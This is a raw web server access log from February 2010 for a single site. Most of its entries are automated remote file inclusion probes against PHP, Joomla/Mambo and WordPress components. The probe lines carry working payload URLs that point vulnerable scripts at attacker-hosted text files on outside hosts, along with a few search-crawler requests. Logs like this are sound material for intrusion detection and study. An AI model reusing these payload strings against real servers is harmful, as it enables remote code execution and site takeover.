200.93.147.154 - - [07/Feb/2010:04:40:02 -0800] "GET /logs/access_100119.log%20%20///write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:04:40:08 -0800] "GET /logs/access_100119.log%20%20///write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [07/Feb/2010:04:40:24 -0800] "GET /logs/access_100115.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [07/Feb/2010:04:40:39 -0800] "GET /logs/access_100117.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [07/Feb/2010:04:40:47 -0800] "GET /logs/access_100122.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.25.151 - - [07/Feb/2010:04:41:03 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "puaga.com"
65.55.25.151 - - [07/Feb/2010:04:41:03 -0800] "GET /sitemap.xml HTTP/1.1" 200 231 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "puaga.com"
210.114.175.110 - - [07/Feb/2010:04:41:25 -0800] "GET /logs/access_100127.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.175.110 - - [07/Feb/2010:04:41:25 -0800] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.175.110 - - [07/Feb/2010:04:41:25 -0800] "GET /components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.175.110 - - [07/Feb/2010:04:41:34 -0800] "GET /components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.175.110 - - [07/Feb/2010:04:41:34 -0800] "GET /logs/access_100127.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.175.110 - - [07/Feb/2010:04:41:35 -0800] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:12 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:12 -0800] "GET /appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:12 -0800] "GET /logs/access_100114.log//appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:13 -0800] "GET /appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:14 -0800] "GET /logs/access_100114.log//appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:14 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:34 -0800] "GET /logs/access_100111.log//appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:04:43:41 -0800] "GET /logs/access_100111.log//appserv/main.php?appserv_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [07/Feb/2010:04:44:29 -0800] "GET /logs/access_100126.log//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [07/Feb/2010:04:44:29 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [07/Feb/2010:04:44:29 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.114.175.110 - - [07/Feb/2010:04:44:40 -0800] "GET /logs/access_100106.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.175.110 - - [07/Feb/2010:04:44:42 -0800] "GET /logs/access_100106.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Feb/2010:04:45:31 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Feb/2010:04:45:31 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
72.55.146.200 - - [07/Feb/2010:04:47:01 -0800] "GET /logs/access_100111.log//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.38.160.77 - - [07/Feb/2010:04:47:07 -0800] "GET /logs/access_100126.log//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Feb/2010:04:49:14 -0800] "GET /logs/access_100111.log//errors.php?error=http://www.openbee.org/media/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:04:49:50 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:04:49:53 -0800] "GET /logs/access_100119.log///write_update.php?board_skin_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [07/Feb/2010:04:50:51 -0800] "GET /logs/index.php?stranica=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [07/Feb/2010:04:50:52 -0800] "GET /index.php?stranica=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [07/Feb/2010:04:51:00 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [07/Feb/2010:04:51:37 -0800] "GET /logs/access_100110.log%20%20/index.php?stranica=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [07/Feb/2010:04:53:08 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [07/Feb/2010:04:53:09 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:04:53:15 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:04:53:21 -0800] "GET /logs/access_100123.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:04:53:21 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [07/Feb/2010:04:53:27 -0800] "GET /logs/access_100131.log/index.php?stranica=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:04:53:57 -0800] "GET /logs/access_091231.log///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:04:57:14 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:04:57:14 -0800] "GET /logs/access_100127.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:04:57:15 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:04:59:47 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:04:59:48 -0800] "GET /logs/access_100104.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:04:59:49 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [07/Feb/2010:04:59:54 -0800] "GET /logs/access_100110.log/index.php?stranica=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:05:01:15 -0800] "GET /components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:05:01:15 -0800] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:05:01:15 -0800] "GET /logs/access_100127.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:05:01:27 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:05:01:28 -0800] "GET /logs/access_100104.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:05:01:29 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:05:03:19 -0800] "GET /logs/access_100106.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:05:00 -0800] "GET /logs/access_100121.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:05:00 -0800] "GET /logs/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:05:00 -0800] "GET /delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:05:06 -0800] "GET /logs/access_100202.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:17 -0800] "GET /logs/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:17 -0800] "GET /delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:17 -0800] "GET /logs/access_100121.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:23 -0800] "GET /delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:23 -0800] "GET /logs/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:23 -0800] "GET /logs/access_100121.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:28 -0800] "GET /logs/access_100202.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [07/Feb/2010:05:05:34 -0800] "GET /logs/access_100115.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:05:37 -0800] "GET /logs/access_100202.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:05:53 -0800] "GET /delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:05:53 -0800] "GET /logs/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:05:59 -0800] "GET /logs/access_100121.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:06:05 -0800] "GET /logs/access_100202.log/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:06:07 -0800] "GET /logs/access_100129.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:06:07 -0800] "GET /v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:06:07 -0800] "GET /logs//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:06:09 -0800] "GET /logs/access_100108.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:05:06:39 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:05:06:39 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:05:06:39 -0800] "GET /logs/access_100106.log%20%20///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:05:06:59 -0800] "GET /logs/access_100121.log%20%20///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:07:29 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:07:29 -0800] "GET /logs/access_100106.log%20%20///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:07:29 -0800] "GET /logs///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:05:07:48 -0800] "GET /logs/access_100121.log%20%20///components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:09:28 -0800] "GET /v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:09:29 -0800] "GET /logs/access_100129.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:09:29 -0800] "GET /logs//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:09:29 -0800] "GET /logs/access_100108.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:05:11:36 -0800] "GET /logs/access_100104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:05:12:22 -0800] "GET /logs/access_100106.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:13:26 -0800] "GET /logs/access_100107.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:13:26 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:13:26 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:13:26 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:05:13:27 -0800] "GET /logs/access_100104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.3.136 - - [07/Feb/2010:05:14:10 -0800] "GET /logs/access_100106.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:16:48 -0800] "GET /delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:16:48 -0800] "GET /logs/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:16:49 -0800] "GET /logs/access_100121.log%20%20/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:16:59 -0800] "GET /logs/access_100202.log%20%20/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:17:17 -0800] "GET /errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:17:18 -0800] "GET /logs/access_100109.log/errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:17:18 -0800] "GET /logs/errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:05:17:57 -0800] "GET /logs/access_100113.log/errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:18:43 -0800] "GET /delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:18:43 -0800] "GET /logs/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:18:43 -0800] "GET /logs/access_100121.log%20%20/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.74.81.167 - - [07/Feb/2010:05:18:51 -0800] "GET /logs/access_100202.log%20%20/delete_all.php/bbs////delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/upload/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:05:23:14 -0800] "GET /logs/access_100107.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
